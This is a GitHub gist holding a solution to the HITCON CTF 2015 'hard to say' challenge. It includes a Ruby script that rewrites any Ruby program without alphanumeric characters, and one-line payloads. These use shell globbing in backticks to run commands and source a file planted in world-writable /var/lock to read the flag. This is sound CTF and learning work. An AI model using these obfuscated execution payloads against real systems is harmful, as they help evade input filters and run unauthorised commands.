Last active
October 18, 2015 17:20
-
-
Save shinh/4999b3d154aafc774b91 to your computer and use it in GitHub Desktop.
HITCON CTF 2015 hard to say
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I used a generic ruby-to-symbolic-ruby converter (gen_hts.rb) to get | |
the first flag. I used m4 to get the second and third ones | |
(hts3.rb). As I couldn't come up with the use of $0, I played with the | |
first server for a while. I've realized /var/lock is world-writable, | |
so I created "/var/lock/!" whose content is "cat flag". |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# This program converts any Ruby program into a Ruby which does not | |
# have alpha numeric characters. | |
N = 5 | |
c = '""' | |
File.read('hts_eval.rb').each_byte do |b| | |
s = b.to_s(N) | |
o = '' | |
prev_add = nil | |
s.each_char.each_with_index do |c, i| | |
if i > 0 | |
if prev_add | |
o = "(#{o})*__" | |
else | |
o = "#{o}*__" | |
end | |
end | |
if prev_add = c.to_i > 0 | |
if o.empty? | |
o += ['_'] * c.to_i * '+' | |
else | |
o += '+_' * c.to_i | |
end | |
end | |
end | |
c += "<<" + o | |
end | |
o = %q(_="#"=~/$/;__=_+_+_+_+_;->(&_){_[_,(_="#"=~/$/;__=_+_+_+_+_;"#{""<<(_+_+_+_)*__*__+_<<((_+_+_+_)*__+_+_+_)*__+_+_+_<<((_+_+_)*__+_+_+_+_)*__+_+_<<((_+_+_+_)*__+_)*__+_+_+_}"),(_="#"=~/$/;__=_+_+_+_+_;"#{TMPL}")]}[&:"#{""<<((_+_+_+_)*__+_+_+_)*__<<(_+_+_+_)*__*__+_<<((_+_+_+_)*__+_+_)*__<<(_+_+_+_)*__*__}"]) | |
o = o.sub('TMPL',c) | |
STDERR.puts o.size | |
puts o |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_="#"=~/$/;`/???/*/?#{_+_+_+_} *` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
`. /*/*/!` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment